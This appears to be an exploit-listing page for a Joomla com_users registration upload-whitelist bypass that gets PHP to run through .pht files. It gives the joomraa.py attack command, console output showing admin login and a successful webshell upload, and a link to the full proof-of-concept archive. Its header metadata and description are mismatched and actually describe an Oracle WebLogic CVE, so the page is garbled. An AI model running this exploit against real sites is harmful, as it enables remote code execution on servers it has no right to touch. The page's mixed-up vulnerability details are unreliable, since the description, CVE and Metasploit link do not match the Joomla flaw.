header-logo
Suggest Exploit
vendor:
Joomla
by:
XiphosResearch
8,8
CVSS
HIGH
Joomla com_users:user.register Whitelisting Bypass
434
CWE
Product Name: Joomla
Affected Version From: Joomla 3.9.0
Affected Version To: Joomla 3.9.19
Patch Exists: YES
Related CWE: CVE-2020-14750
CPE: a:joomla:joomla
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2020-14750/
Other Scripts: N/A
Tags: packetstorm,cve,cve2020,rce,oracle,weblogic,unauth,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://github.com/pprietosanchez/CVE-2020-14750https://www.oracle.com/security-alerts/alert-cve-2020-14750.htmlhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750https://nvd.nist.gov/vuln/detail/CVE-2020-14750http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"Weblogic Application Server"', 'verified': True, 'vendor': 'oracle', 'product': 'fusion_middleware'}
Platforms Tested: Linux, Mac, Windows
2020

Joomla com_users:user.register Whitelisting Bypass

Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.

Mitigation:

To mitigate this vulnerability, administrators should ensure that the whitelisting of the Joomla com_users:user.register component is properly configured to block the upload of malicious files with the .pht extension.
Source

Exploit-DB raw data:

Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa

While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:

<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
Usage

Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.

$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla 

     @@@   @@@@@@    @@@@@@   @@@@@@@@@@   @@@@@@@    @@@@@@    @@@@@@   @@@  
     @@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  
     @@!  @@!  @@@  @@!  @@@  @@! @@! @@!  @@!  @@@  @@!  @@@  @@!  @@@  @@!  
     !@!  !@!  @!@  !@!  @!@  !@! !@! !@!  !@!  @!@  !@!  @!@  !@!  @!@  !@   
     !!@  @!@  !@!  @!@  !@!  @!! !!@ @!@  @!@!!@!   @!@!@!@!  @!@!@!@!  @!@  
     !!!  !@!  !!!  !@!  !!!  !@!   ! !@!  !!@!@!    !!!@!!!!  !!!@!!!!  !!!  
     !!:  !!:  !!!  !!:  !!!  !!:     !!:  !!: :!!   !!:  !!!  !!:  !!!       
!!:  :!:  :!:  !:!  :!:  !:!  :!:     :!:  :!:  !:!  :!:  !:!  :!:  !:!  :!:  
::: : ::  ::::: ::  ::::: ::  :::     ::   ::   :::  ::   :::  ::   :::   ::  
 : :::     : :  :    : :  :    :      :     :   : :   :   : :   :   : :  :::  

[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla


Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip

Navigation

Suggest Exploit

Services By CQR